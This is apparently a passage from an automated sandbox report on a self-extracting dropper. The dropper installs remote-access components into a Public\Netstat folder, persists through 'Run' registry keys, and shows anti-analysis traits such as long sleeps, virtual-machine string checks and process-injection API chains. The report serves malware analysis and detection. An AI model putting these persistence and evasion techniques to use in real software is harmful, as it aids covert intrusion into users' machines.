                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nsmtrace.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nslsp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: devobj.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msasn1.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicl32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: shfolder.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcichek.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: mpr.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: version.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winmm.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wsock32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wininet.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netutils.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: samcli.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wtsapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nsmtrace.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nslsp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: devobj.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msasn1.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicl32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: shfolder.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcichek.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: pcicapi.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: mpr.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: version.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: winmm.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wsock32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wininet.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: netutils.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: samcli.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: wtsapi32.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nsmtrace.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: nslsp.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: devobj.dll
                                Source: C:\Users\Public\Netstat\shv.exe | Section loaded: msasn1.dll
                                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                Source: C:\Users\Public\Netstat\shv.exe | File opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window Recorder | Window detected: More than 3 window changes detected
                                Source: file.exe | Static PE information: Image base 0x140000000 > 0x60000000
                                Source: file.exe | Static file information: File size 2283788 > 1048576
                                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Public\Netstat\msvcr100.dll
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000005.00000002.4133157062.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000008.00000002.1694833283.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.1806765097.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.1887019832.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.1968818486.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000005.00000002.4133414083.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000008.00000002.1695153610.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.1807037873.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.1887260588.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.1969045817.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000005.00000002.4133318649.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000008.00000002.1695028330.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.1806911181.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.1887171743.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.1968966209.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.0.dr
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,5_2_11029590
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_4506265
                                Source: file.exe | Static PE information: section name: .didat
                                Source: file.exe | Static PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.dr | Static PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1C5156 push rsi; retf 0_2_00007FF6FE1C5157
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1C5166 push rsi; retf 0_2_00007FF6FE1C5167
                                Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1116F055 push ecx; ret 5_2_1116F068
                                Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11169F49 push ecx; ret 5_2_11169F5C
                                Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1116F055 push ecx; ret 8_2_1116F068
                                Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11169F49 push ecx; ret 8_2_11169F5C
                                Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11040E01 push 3BFFFFFEh; ret 8_2_11040E06
                                Source: msvcr100.dll.0.dr | Static PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\shv.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,5_2_11127E10
Source: C:\Windows\System32\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
Source: C:\Windows\System32\reg.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,5_2_11139090
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,5_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,5_2_11113290
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,5_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,5_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,5_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,5_2_11024280
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11112670 IsIconic,GetTickCount,5_2_11112670
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,5_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,8_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,8_2_11139090
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,8_2_11113290
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,8_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,8_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11024280
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11112670 IsIconic,GetTickCount,8_2_11112670
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,8_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,8_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_11143570
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Netstat\shv.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110B8200 Sleep,ExitProcess,5_2_110B8200
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110B8200 Sleep,ExitProcess,8_2_110B8200
Source: C:\Users\Public\Netstat\shv.exe | Window / User API: threadDelayed 453
Source: C:\Users\Public\Netstat\shv.exe | Window / User API: threadDelayed 7875
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLL
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exe
Source: C:\Users\user\Desktop\file.exe | Dropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLL
Source: C:\Users\Public\Netstat\shv.exe | Evaded block: after key decision (graph_5-54313)
Source: C:\Users\Public\Netstat\shv.exe | Evaded block: after key decision (graph_5-58147)
Source: C:\Users\Public\Netstat\shv.exe | Evaded block: after key decision (graph_5-58183)
Source: C:\Users\Public\Netstat\shv.exe | Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe | Evasive API call chain: GetSystemTimeAsFileTime
Source: C:\Users\Public\Netstat\shv.exe | Evasive API call chain: GetLocalTime (graph_5-58271)
Source: C:\Users\Public\Netstat\shv.exe | Check user administrative privileges: GetTokenInformation (graph_5-58079)
Source: C:\Users\Public\Netstat\shv.exe | API coverage: 6.4 %
Source: C:\Users\Public\Netstat\shv.exe | API coverage: 2.6 %
Source: C:\Users\Public\Netstat\shv.exe TID: 2336 | Thread sleep time: -76750s >= -30000s
Source: C:\Users\Public\Netstat\shv.exe TID: 4480 | Thread sleep time: -45300s >= -30000s
Source: C:\Users\Public\Netstat\shv.exe TID: 2336 | Thread sleep time: -1968750s >= -30000s
Source: C:\Users\Public\Netstat\shv.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\Public\Netstat\shv.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1940BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1AB190
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1BFCA0 FindFirstFileExA,0_2_00007FF6FE1BFCA0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11065890
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_1110AFD0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1B16A4 VirtualQuery,GetSystemInfo,0_2_00007FF6FE1B16A4
Source: HTCTL32.DLL.0.dr | Binary or memory string: VMware
Source: HTCTL32.DLL.0.dr | Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr | Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: HTCTL32.DLL.0.dr | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
